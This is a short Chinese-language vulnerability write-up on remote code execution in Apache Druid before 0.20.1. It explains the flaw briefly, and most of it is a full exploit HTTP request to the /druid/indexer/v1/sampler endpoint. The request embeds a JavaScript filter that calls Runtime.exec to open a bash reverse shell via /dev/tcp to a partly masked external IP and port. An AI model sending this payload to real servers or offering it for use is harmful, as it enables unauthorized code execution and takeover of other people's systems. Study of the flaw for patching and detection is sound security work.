漏洞原因

Apache Druid能够执行嵌入在各种类型的请求中的用户提供的JavaScript代码。此功能旨在用于高信任度环境，默认情况下处于禁用状态。但是，在Druid 0.20.0和更早版本中，经过身份验证的用户可以发送特制请求，以强制Druid为该请求运行用户提供的JavaScript代码，而不管服务器配置如何。这可以利用Druid服务器进程的特权在目标计算机上执行代码。

漏洞影响

Apache Druid<0.20.1

漏洞复现

Exp

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 183.134.*.2*:8*1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json
Content-Length: 1048
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diff Url\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":3 1,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"nam espace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [],
"filter": {"type": "javascript", "dimension": "added", "function":
"function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/39.*8.*.*7/23333 0>&1')}", "": {"enabled": true}}}},
"type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}